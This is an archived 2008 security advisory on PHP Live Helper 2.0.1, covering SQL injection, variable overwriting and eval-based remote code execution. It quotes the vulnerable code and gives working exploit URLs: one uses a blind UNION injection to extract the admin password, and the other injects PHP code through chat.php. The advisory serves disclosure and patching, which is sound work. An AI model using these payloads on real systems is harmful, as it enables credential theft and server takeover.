Documents
Resources
Learning Center
Upload
Plans & pricing Sign in
Sign Out
Your Federal Quarterly Tax Payments are due April 15th Get Help Now >>

PHP Live Helper 2.0.1 Multiple Remote Vulnerabilities

VIEWS: 211 PAGES: 3

									                           PHP Live Helper 2.0.1 Multiple Remote Vulnerabilities   Page 1/3
   1   ##########################################################
   2   # GulfTech Security Research              August 16, 2008
   3   ##########################################################
   4   # Vendor : Turnkey Web Tools, Inc
   5   # URL : http://www.turnkeywebtools.com
   6   # Version : PHP Live Helper <= 2.0.1
   7   # Risk : Multiple Vulnerabilities
   8   ##########################################################
   9
  10
  11   Description:
  12   PHP Live Helper is an online support system written in php that
  13   allows the visitors of a website to interact in real time with
  14   the site owners. There are a number of issues in PHP Live Helper
  15   that allow for several different attacks such as SQL Injection,
  16   Variable Overwriting, and remote code execution. The issues
  17   require no authentication to exploit, and users are encouraged
  18   to upgrade as soon as possible.
  19
  20
  21
  22   SQL Injection:
  23   There are a number of SQL Injection issues in PHP Live Helper
  24   that allow for an attacker to have arbitrary access to database
  25   contents such as administrator credentials. First, let’s have a
  26   look at global.php @ lines 51−60
  27
  28   function get ($table, $id, $from="id") {
  29       $result=$this−>DB_site−>query_first("SELECT * FROM ".
  30       $this−>dbprefix.$table." where ".$from."=’$id’");
  31       if (is_array($result)) {
  32           foreach ($result as $key => $val) {
  33               $info[$key] = stripslashes($val);
  34           }
  35       }
  36       return $info;
  37   }
  38
  39   As we can see in the above code, all of the parameters passed to
  40   the get() function are unsanitized. So, if the data is not sanitized
  41   before being sent to get() we have an SQL Injection issue.
  42
  43   /onlinestatus_html.php?dep=−99’ UNION SELECT 1,2,3,4,5,6,7,8 FROM
  44   admin_accounts WHERE id=1 AND MID(password,1,1)=concat(char(50))/*
  45
  46   An example of the vulnerable function being called can be seen in
  47   onlinestatus_html.php @ line 19. As a result a url like the one
  48   above can be used to enumerate the admin password for the PHP Live
  49   Helper installation. If there is a match to the specified character
  50   you will see an sql error, otherwise you will see an image file.
  51
  52

GulfTech Security                                                                  08/18/2008
                              PHP Live Helper 2.0.1 Multiple Remote Vulnerabilities   Page 2/3
  53
  54    Arbitrary Variable   Overwriting:
  55    PHP Live Helper is   vulnerable to a limited Variable Overwriting issue
  56    due to some faulty   register globals emulation code. The vulnerable code
  57    in question can be   found at libsecure.php @ lines 400−414
  58
  59    unset ($_GET[abs_path]);
  60    $rg = ini_get (’register_globals’);
  61    $getget_count = @count ($_GET);
  62    $getget_keys = @array_keys ($_GET);
  63    for ($i = 0; $i < $getget_count; ++$i)
  64    {
  65      $getget_name = $getget_keys[$i];
  66      $getget_value = $_GET[$getget_keys[$i]];
  67      $_GET[$getget_name] = strip_tags (urldecode ($getget_value));
  68      if ($rg == 1)
  69      {
  70        $$getget_name = strip_tags (urldecode ($getget_value));
  71        continue;
  72      }
  73    }
  74
  75    The above code shows that variables can be overwritten, but because
  76    of where it is called, only variables from within the db config file
  77    can be overwritten (database info, and language file setting). This
  78    is enough though to allow an attacker to execute arbitrary code on the
  79    server by overwriting the table prefix variable with an arbitrary SQL
  80    query in order to gather the location of report files, and then
  81    overwriting the language file so that the report containing the
  82    malicious php code is included and executed. The odd thing is that this
  83    registers global emulation code is only called when register globals is
  84    already on, so it is kind of pointless.
  85
  86
  87
  88    Arbitrary Code Execution:
  89    A different bit of code is set to run when register globals are off. The
  90    code in question is located in /includes/globalsoff.php and attempts to
  91    emulate register gloabls by recursively creating variables based on the
  92    GPC super globals. The problem is that all of the variable creation is
  93    done using eval() and thus allows for remote code execution.
  94
  95    /chat.php?rg=0&test=";phpinfo();exit;//
  96
  97    A url like the one shown above will successfully execute the specified
  98    arbitrary php code. It should be noted that by setting rg=0 an attacker
  99    can have this code ran regardless of register globals settings since if
  100   globals is on you can influence the "rg" parameter, and if it is off,
  101   the script runs as intended.
  102
  103
  104

GulfTech Security                                                                     08/18/2008
                            PHP Live Helper 2.0.1 Multiple Remote Vulnerabilities         Page 3/3
  105   Solution:
  106   The TurnKeyWebTools developers have addressed these issues in the latest
  107   version of PHP Live Helper which can be found at the following url.
  108
  109   http://www.turnkeywebtools.com/esupport/index.php?_m=news&_a=viewnews&newsid=62
  110
  111
  112   Credits:
  113   James Bercegay of the GulfTech Security Research Team
  114
  115   # milw0rm.com [2008−08−18]




GulfTech Security                                                                         08/18/2008

								
To top